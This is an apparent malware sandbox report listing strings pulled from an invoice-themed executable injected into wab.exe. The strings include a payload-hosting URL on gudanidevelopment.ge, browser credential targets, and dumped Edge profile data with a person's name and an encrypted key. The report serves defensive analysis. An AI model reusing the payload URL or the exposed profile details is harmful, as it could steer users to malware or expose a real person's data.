19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profileANg3Zw2QouYXcOw3P8MgEYmqBohsyHX3A0QYKqCpqgaYKnCaImmJqgaoKr2eaJ8Qu6JvhC8IXgC8EXskfsUsie4Rd8IfhC8IXgC8EXgi8EXwi+EHxhm5eAX/CF4Gudt8rtxcmWHtzKEYrlqfPwGMw8n+fDLltVh7rgekAiRnsBdgY/P4Itiocfnljxe+W2ga1bwbr1j/CS/34+f3++b1IqgQeX2IdvZPSDce7EDIYgeJVNpXPeTKuHZ5yVD9wJ0DceUugUaQm3qtju0YTnB5MKDsADH+gwWG2vonWTUqaj9QFb2Dy/bF7sY6I1n2DJHmpa7A/qg4yb4S6NqPJ9AtKm/5KR8b3rp9+LtsdJcYYVbLtPZTteneEulyXk/54QMpAYEW3NtmiWweguM1wR+XqhTdqDDDBykftettEI9cW4grTMwqcc equals www.facebook.com (Facebook)
              Source: wab.exe, 00000009.00000003.40247568184.00000000046B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profile{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20","background_apps":false,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_last_name":"Shapira","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_force_signout_state":0,"edge_kids_mode":false,"edge_muid":"243215E5327669D43677068133B66811","edge_previously_signin_user_name":"","edge_signed_in_default_name":33554433,"edge_test_on_premises":false,"edge_wam_aad_for_app_account_type":0,"edge_was_previously_signin":false,"force_signin_profile_locked":false,"gaia_given_name":"","gaia_id
              Source: wab.exe, 00000007.00000002.45066609211.0000000035570000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.45066609211.0000000035570000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://contentstorage.osi.office.net/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.globalsign.com/gsgccr3dvtlsca2020.crl0#
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdig2s1-2558.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.pki.goog/gtsr1/gtsr1.crl0W
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertSHA2SecureServerCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0D
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g7.crl0/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertSHA2SecureServerCA.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-3.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/fVJxbV-Ktmk.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crls.pki.goog/gts1c3/zdATt0Ex_Fk.crl0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
              Source: wab.exe, 00000007.00000003.40256849481.0000000004CC2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40202980557.0000000004CBB000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40525599454.0000000004CC2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052676027.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40203086900.0000000004CC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
              Source: wab.exe, 00000007.00000002.45052676027.0000000004C6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpn.net/LMEMH8
              Source: wab.exe, 00000007.00000003.40526012940.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45052911947.0000000004C97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpy
              Source: wab.exe, wab.exe, 00000007.00000002.45052911947.0000000004C88000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000007.00000002.45065735573.00000000342A0000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000007.00000003.40526012940.0000000004C86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.bin
              Source: wab.exe, 00000007.00000002.45065735573.00000000342A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://gudanidevelopment.ge/IogvoayYhe139.binSchoSvltathirchimie.com/IogvoayYhe139.bin
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://o.ss2.us/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.comodoca.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0:
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0B
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0F
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0G
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0H
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0M
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.globalsign.com/ca/gsovsha2g4r30
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr3dvtlsca20200V
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/02
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.godaddy.com/05
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.msocsp.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gsr10)
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gts1c301
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.pki.goog/gtsr100
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.rootg2.amazontrust.com08
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.sca1b.amazontrust.com06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp.sectigo.com0%
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocsp2.globalsign.com/rootr30;
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://ocspx.digicert.com0E
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/gsr1/gsr1.crt02
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der0$
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gts1c3.der07
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://s.ss2.us/r.crl0
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://s.symcd.com06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr3dvtlsca2020.crt09
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/gsovsha2g4r3.crt0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://status.geotrust.com0=
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://status.thawte.com09
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://trc.taboola.com/p3p.xml
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 18001787_down_payment_invoice_90002104.exe, Filamenterne.exe.7.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0u
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0v
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://www.digicert.com/CPS0~
              Source: wab.exe, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
              Source: wab.exe, wab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
              Source: wab.exe, 0000000B.00000002.40221415732.00000000000DC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/hrq
              Source: wab.exe, 0000000B.00000002.40221938113.0000000002CBD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
              Source: wab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
              Source: wab.exe, 00000007.00000002.45066782478.0000000035600000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
              Source: wab.exe, 00000009.00000002.40252547768.0000000000306000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: wab.exe, 0000000B.00000002.40221614069.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: bhv3A27.tmp.9.drString found in binary or memory: http://x.ss2.us/x.cer0&
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.double
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doublecli
              Source: wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activ
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activi
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247804695.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247422659.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40241458515.00000000046AD000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247048218.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247568184.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246925734.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40247709473.00000000046BA000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=37393684334
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7209567
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/ast/ast.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://acdn.adnxs.com/dmp/async_usersync.html?gdpr=1&gdpr_consent=CPM7kC1PM7kC1AcABBENBQCsAP_AAELAA
              Source: wab.exe, 00000009.00000003.40246408330.00000000046AC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000003.40246459962.00000000046AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://adservice.google.co.
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gt
              Source: wab.exe, 00000009.00000003.40243774570.00000000046A1000.00000004.00000020.00020000.00000000.sdmp, bhv3A27.tmp.9.drString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3739368433491;gtm=
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?daed76fa672ed2fa739774d44bb38da5
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://afdxtest.z01.azurefd.net/apc/trans.gif?e77f8dc2c88b806ec91fb50956aeee97
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.js
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://api.taboola.com/1.2/json/taboola-usersync/user.sync?app.type=desktop&app.apikey=e60e3b54fc66
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC028e72ad6b944b8183346fecb32a729
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC05934b07a40a4d8a9a0cc7a79e85434
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2
              Source: bhv3A27.tmp.9.drString found in binary or memory: https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684
